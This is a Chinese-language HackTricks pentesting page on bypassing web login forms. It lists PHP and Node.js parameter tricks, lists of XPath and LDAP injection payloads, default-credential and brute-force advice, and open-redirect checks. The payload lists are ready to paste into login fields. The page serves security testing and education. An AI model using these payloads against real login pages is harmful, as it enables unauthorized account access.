Login Bypass

从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家)

RootedCON西班牙最重要的网络安全活动之一,也是欧洲最重要的之一。作为促进技术知识的使命,这个大会是技术和网络安全专业人士在各个领域的热点交流地。

绕过常规登录

如果找到一个登录页面,您可以尝试以下一些技术来绕过它:

  • 检查页面内的注释(向下滚动并向右滚动?)

  • 检查是否可以直接访问受限页面

  • 检查不发送参数(不发送任何参数或仅发送一个参数)

  • 检查PHP比较错误: user[]=a&pwd=buser=a&pwd[]=buser[]=a&pwd[]=b

  • 将内容类型更改为json并发送json值(包括bool true)

  • 如果收到响应说POST不受支持,可以尝试使用Content-Type: application/json在GET请求中发送JSON主体

  • 检查nodejs潜在的解析错误(阅读此文章):password[password]=1

  • Nodejs将将该有效负载转换为类似以下查询:SELECT id, username, left(password, 8) AS snipped_password, email FROM accounts WHERE username='admin' AND`` ``password=password=1; 这将使密码部分始终为真。

  • 如果可以发送JSON对象,则可以发送"password":{"password": 1}来绕过登录。

  • 请记住,要绕过此登录,您仍然需要知道并发送有效的用户名

  • 在调用mysql.createConnection时添加"stringifyObjects":true选项最终将阻止在参数中传递Object时的所有意外行为

  • 检查凭据:

  • 使用所使用技术/平台的默认凭据

  • 常见组合(root、admin、password、技术名称、默认用户与这些密码之一)

  • 使用Cewl创建字典,添加默认用户名和密码(如果有的话),并尝试使用所有单词作为用户名和密码进行暴力破解

  • 使用更大的字典进行暴力破解(暴力破解

SQL注入身份验证绕过

在此处,您可以找到通过SQL注入绕过登录的几种技巧

在以下页面中,您可以找到一个自定义列表,尝试通过SQL注入绕过登录:

pageLogin bypass List

无SQL注入身份验证绕过

在此处,您可以找到通过无SQL注入绕过登录的几种技巧

由于无SQL注入需要更改参数值,您需要手动测试它们。

XPath注入身份验证绕过

在此处,您可以找到通过XPath注入绕过登录的几种技巧

' or '1'='1
' or ''='
' or 1]%00
' or /* or '
' or "a" or '
' or 1 or '
' or true() or '
'or string-length(name(.))<10 or'
'or contains(name,'adm') or'
'or contains(.,'adm') or'
'or position()=2 or'
admin' or '
admin' or '1'='2

LDAP注入身份验证绕过

在这里,您可以找到几种绕过LDAP注入登录的技巧。

*
*)(&
*)(|(&
pwd)
*)(|(*
*))%00
admin)(&)
pwd
admin)(!(&(|
pwd))
admin))(|(|

记住我

如果页面具有“记住我”功能,请检查其实现方式,看看是否可以滥用该功能来接管其他账户

重定向

通常在登录后页面会重定向用户,请检查是否可以更改该重定向以引发开放重定向。如果将用户重定向到您的网站,也许可以窃取一些信息(代码、cookie...)。

其他检查

  • 检查是否可以通过滥用登录功能枚举用户名

  • 检查密码/敏感信息表单自动完成是否处于活动状态:<input autocomplete="false"

​​RootedCON西班牙最重要的网络安全活动之一,也是欧洲最重要的之一。作为促进技术知识的使命,这个大会是技术和网络安全专业人士在各个领域的热点聚会。

从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS Red Team Expert)

最后更新于